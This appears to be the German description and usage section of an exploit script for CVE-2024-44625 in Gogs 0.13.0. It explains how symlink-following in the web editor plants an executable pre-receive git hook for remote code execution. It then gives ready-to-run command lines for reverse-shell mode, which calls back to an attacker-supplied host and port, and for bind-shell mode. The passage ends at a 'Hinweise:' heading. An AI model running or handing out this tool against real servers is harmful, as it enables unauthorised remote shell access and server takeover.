
Exploit für CVE-2024-44625 in Gogs 0.13.0, der Remote-Codeausführung über Symlink-Following zur Erstellung eines Git-Hooks erreicht, mit Reverse- und Bind-Shell-Modi.
Validiert gegen eine Gogs-Version aus der 0.13.0-Ära hinter einem Reverse-Proxy. Primitive: Symlink-Follow im Web-Editor zu einer NICHT VORHANDENEN .git/hooks/pre-receive erstellt diese Datei (ausführbar). Jeder anschließende Push auf das Repository führt sie aus.
Verwendung:
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost <YOUR_IP> --lport 4444
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode bind --bind-port 5555
python3 gogs_rce_shell.py --url http://host --user admin1 --pass 'P@ss' \
--mode reverse --lhost IP --lport 4444 --repo <name> --reuse --triggers 3
Hinweise: